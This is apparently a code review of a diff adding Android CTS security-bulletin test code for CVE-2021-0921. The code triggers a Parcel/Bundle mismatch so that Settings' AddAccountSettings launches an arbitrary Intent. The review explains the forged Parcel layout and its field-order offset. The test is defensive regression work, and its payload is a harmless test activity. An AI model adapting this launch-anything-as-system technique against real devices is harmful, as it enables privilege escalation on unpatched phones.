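Review bot: `parsingPackageImplParcel()` has no header explaining what the hand-built Parcel represents, and the layout is only readable through the trailing `// fieldA -> fieldB` comments that start at `data.writeInt(0); // labelRes -> queriesPackages`. A doc comment should state that the Parcel mimics the `onResult(Bundle)` transaction: interface token, a non-null marker, a length-prefixed Bundle with magic `0x4C444E42`, three entries (`key1` as a parcelable named `android.content.pm.parsing.ParsingPackageImpl`, `key2` as a null, `key3` as a byte array) and, nested inside the byte array, a `KEY_INTENT` entry wrapping the caller-supplied Intent; the type codes 4, -1 and 13 appear to be Parcel's VAL_PARCELABLE, VAL_NULL and VAL_BYTEARRAY — confirm against Parcel.java. The `->` comments seem to record the offset between the field order written here and the order a different reader consumes, which is the crux of the PoC and deserves a sentence of its own rather than being inferred. `intent` is dereferenced at `intent.writeToParcel(data, 0)` without a check, so `Objects.requireNonNull(intent, "Authenticator.mIntent not set");` at the top (with a `java.util.Objects` import) gives a clear error when Trigger has not run, and the `false ? 1 : 0` / `true ? 1 : 0` constants can be written as plain `0`/`1` with the boolean meaning kept in the comment.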
@@ -0,0 +1,23 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.content.Context;
+import android.app.Activity;
+
+import android.os.Bundle;
+import android.util.Log;
+import org.junit.Assert;
+
+public class TestActivity extends Activity {
+ private static final String TAG = "TAG_2021_0921.TestActivity";
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ Log.d(TAG, "onCreate() start");
+ Assert.fail("Arbitrary intent executed. Device is vulnerable.");
+ }
+}
+
+
+
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java
new file mode 100644
index 00000000000..987b161766f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java
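Review bot: `Assert.fail(...)` inside `onCreate()` throws an AssertionError from an Activity lifecycle callback, and nothing in this class says how that becomes the test verdict; presumably the uncaught exception in the instrumented process is what the runner reports, but a reader of this file alone cannot tell. Add a comment above the call such as `// Reached only if Settings launched the forged intent; the uncaught AssertionError is reported by the instrumentation as the DeviceTest failure.` The `android.content.Context` import is unused.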
@@ -0,0 +1,41 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.ApplicationInfo;
+import android.net.Uri;
+import android.util.Log;
+
+import java.io.File;
+
+public class Trigger {
+ private static final String TAG = "TAG_2021_0921.Triggger";
+ private Context mContext;
+
+ public Trigger(Context context) {
+ mContext = context;
+ }
+
+ public void accountSettings() {
+ Log.d(TAG, "accountSettings() start");
+
+ //replaces intent.setAction(Intent.ACTION_REBOOT) in original Poc
+ Intent arbitraryIntent = new Intent(mContext, TestActivity.class);
+
+ //Patched device is not supposed to process that intent
+ Authenticator.mIntent = arbitraryIntent;
+
+ Intent intent = new Intent();
+ intent.setComponent(new ComponentName(
+ "com.android.settings",
+ "com.android.settings.accounts.AddAccountSettings"));
+ intent.setAction(Intent.ACTION_RUN);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ String authTypes[] = {"android.security.cts"};
+
+ intent.putExtra("account_types", authTypes);
+ mContext.startActivity(intent);
+ Log.d(TAG, "accountSettings() end");
+ }
+} |
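Review bot: The log tag in `private static final String TAG = "TAG_2021_0921.Triggger";` is misspelled, which makes this class's output harder to grep alongside the other `TAG_2021_0921.*` tags in this change; use `"TAG_2021_0921.Trigger"`. `String authTypes[] = {"android.security.cts"};` uses the C-style array declarator — `String[] authTypes = {"android.security.cts"};` is the Java convention. The `ApplicationInfo`, `Uri` and `File` imports are unused.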